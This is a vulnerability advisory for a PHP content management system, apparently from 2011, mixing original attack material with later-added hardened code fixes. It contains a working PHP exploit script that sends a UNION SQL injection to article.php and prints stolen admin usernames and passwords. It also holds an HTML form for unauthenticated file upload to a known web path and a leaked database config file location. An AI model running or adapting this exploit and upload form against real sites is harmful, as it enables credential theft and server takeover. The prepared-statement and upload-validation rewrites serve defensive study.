Brief description:
// pageArt.php
// ... omitted
$column = $_POST["column"];
$rownum = $_POST["rownum"];
$sql = " select id,title,addtime from lpc_article where column_id=".$column;
// ... omitted
Other similar files are omitted. $column is concatenated straight into the SQL string with no integer check, so any POST value reaches the query unchanged.
Exp:
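The fix for the pageArt.php fragment above is to stop building SQL from request strings. The following is an added example, not the CMS's own code: it keeps the advisory's table and column names (lpc_article, column_id, id, title, addtime) but the PDO DSN, the credentials, the page-size constant and the ORDER BY / LIMIT clause are assumptions made for the example.

```php
<?php
// Added example (not the CMS's own code): hardened rewrite of pageArt.php.
// Table/column names come from the advisory; DSN, credentials and
// $rows_per_page are assumptions.
declare(strict_types=1);

function intParam(array $src, string $key, int $min, int $max): int
{
    // FILTER_VALIDATE_INT rejects anything that is not a plain integer,
    // so a value such as "1 union select ..." never reaches the query.
    $v = filter_var($src[$key] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    if ($v === false) {
        http_response_code(400);
        exit('invalid parameter: ' . $key);
    }
    return $v;
}

$column        = intParam($_POST, 'column', 1, PHP_INT_MAX);
$rownum        = intParam($_POST, 'rownum', 0, 100000);
$rows_per_page = 20; // assumed page size

$pdo = new PDO('mysql:host=localhost;dbname=lpc;charset=utf8mb4', 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares, not client-side quoting
]);

// The SQL text is a constant; every user value travels as a typed bound parameter.
$stmt = $pdo->prepare(
    'SELECT id, title, addtime FROM lpc_article WHERE column_id = :column '
  . 'ORDER BY addtime DESC LIMIT :offset, :count'
);
$stmt->bindValue(':column', $column, PDO::PARAM_INT);
$stmt->bindValue(':offset', $rownum, PDO::PARAM_INT);
$stmt->bindValue(':count', $rows_per_page, PDO::PARAM_INT);
$stmt->execute();

foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row) {
    // Escape on output as well, so a stored title cannot inject HTML.
    echo htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8'), "\n";
}
```

Binding LIMIT operands as PDO::PARAM_INT only works when emulated prepares are off, which is why the example sets PDO::ATTR_EMULATE_PREPARES to false. The same intParam() check applied to the `id` parameter of article.php would close the query the exploit below relies on.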
<?php
error_reporting(E_ERROR);
print_r('
+---------------------------------------------------------------------+
Sql injection Vul Exploit
Exp :黑小子 cfking
Home: www.2cto.com www.webvul.com
2011.09.20
+---------------------------------------------------------------------+
');
if ($argc < 2) {
print_r('
Usage: php '.$argv[0].' host /path
Example: php '.$argv[0].' www.2cto.com test
');
die();
}
ob_start();
$host = $argv[1];
$path= $argv[2];
$sock = fsockopen($host, 80, $errno, $errstr, 30);
if (!$sock) die("$errstr ($errno)\n");
fwrite($sock, "GET /article.php?id=255%20and%2201=2%20union+select+0,concat(0x63666B696E677339307365637E,uname,0x2D,upass,0x7E31),0,0,0,0,0,0+from+lpc_admin+LIMIT+0,1-- HTTP/1.1\r\n");
fwrite($sock, "Host: $host\r\n");
fwrite($sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:6.0.2) Gecko/20100101 Firefox/6.0.2\r\n");
fwrite($sock, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n");
fwrite($sock, "Accept-Language: zh-cn,zh;q=0.5\r\n");
fwrite($sock, "Connection: keep-alive\r\n\r\n");
$headers = "";
while ($str = trim(fgets($sock, 1024)))
$headers .= "$str\n";
$body = "";
while (!feof($sock))
$body .= fgets($sock, 1024);
fclose($sock);
ob_end_flush();
//print_r($body);
if (strpos($body, 'cfkings90sec') !== false) {
preg_match('/cfkings90sec~(.*?)~1/', $body, $arr);
$result=explode("-",$arr[1]);
print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\n");
}
else{
print_r("Exploit Failed! \n");
}
File upload:
Vulnerable files: admin/column/upload.php
admin/article/upload.php
$upload_dir = '../../uploads/';
$file_path = $upload_dir . $_FILES['myfile']['name'];
$MAX_SIZE = 20000000;
echo $_POST['buttoninfo'];
......
if($_FILES['myfile']['size']>$MAX_SIZE) echo "上传的文件大小超过了规定大小";
if($_FILES['myfile']['size'] == 0) echo "请选择上传的文件";
if(!move_uploaded_file( $_FILES['myfile']['tmp_name'], $file_path)) echo "复制文件失败,请重新上传";
Neither file applies any restriction: no login check, no file-type check, and the client-supplied file name is used as the destination path unchanged.
Exp:
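A hardened replacement for the upload handler quoted above, added here as an example and not taken from the CMS: the `myfile` field name and the `../../uploads/` directory come from the advisory, while the session-based admin check, the allowed image types and the size limit are assumptions chosen for the example.

```php
<?php
// Added example (not the CMS's own code): hardened upload handler.
// 'myfile' and ../../uploads/ come from the advisory; the session check,
// the allowed-type list and $MAX_SIZE are assumptions.
declare(strict_types=1);
session_start();

// 1. The original handler was reachable without any login.
if (empty($_SESSION['admin_id'])) {
    http_response_code(403);
    exit('login required');
}

$upload_dir = realpath(__DIR__ . '/../../uploads');
$MAX_SIZE   = 2 * 1024 * 1024; // assumed 2 MiB policy
$allowed    = [ // extension => MIME type the file content must actually match
    'jpg'  => 'image/jpeg', 'jpeg' => 'image/jpeg',
    'png'  => 'image/png',  'gif'  => 'image/gif',
];

$f = $_FILES['myfile'] ?? null;
if ($f === null || $f['error'] !== UPLOAD_ERR_OK) {
    http_response_code(400);
    exit('no file or upload error');
}
if ($f['size'] === 0 || $f['size'] > $MAX_SIZE) {
    http_response_code(413);
    exit('file size out of range');
}

// 2. Never trust the client-supplied name: it chose the extension and could
//    carry path separators. Decide the type from the bytes, not the name.
$ext  = strtolower(pathinfo($f['name'], PATHINFO_EXTENSION));
$mime = (new finfo(FILEINFO_MIME_TYPE))->file($f['tmp_name']);
if (!isset($allowed[$ext]) || $allowed[$ext] !== $mime) {
    http_response_code(415);
    exit('file type not allowed');
}
if (@getimagesize($f['tmp_name']) === false) {
    http_response_code(415);
    exit('not a valid image');
}

// 3. Server-generated name: no user input reaches the filesystem path.
$name = bin2hex(random_bytes(16)) . '.' . $ext;
$dest = $upload_dir . DIRECTORY_SEPARATOR . $name;

if (!move_uploaded_file($f['tmp_name'], $dest)) {
    http_response_code(500);
    exit('could not store file');
}
chmod($dest, 0644); // readable by the web server, never executable
echo 'stored as /uploads/' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
```

The handler still stores files under the web root, so the uploads directory should additionally have script execution disabled in the web server configuration; the random server-side name and the content-based type check are what stop an arbitrary script from being placed at a known URL.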
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<form enctype="multipart/form-data" action="http://www.2cto.com/admin/column/upload.php" method="post">
<p>After upload the file is at site root /uploads/&lt;your uploaded file name&gt;</p>
<input type="file" name="myfile" size="20">
<input type="submit" value="Upload">
</form>
Information disclosure:
http://www.2cto.com/admin/lib/db/config.xml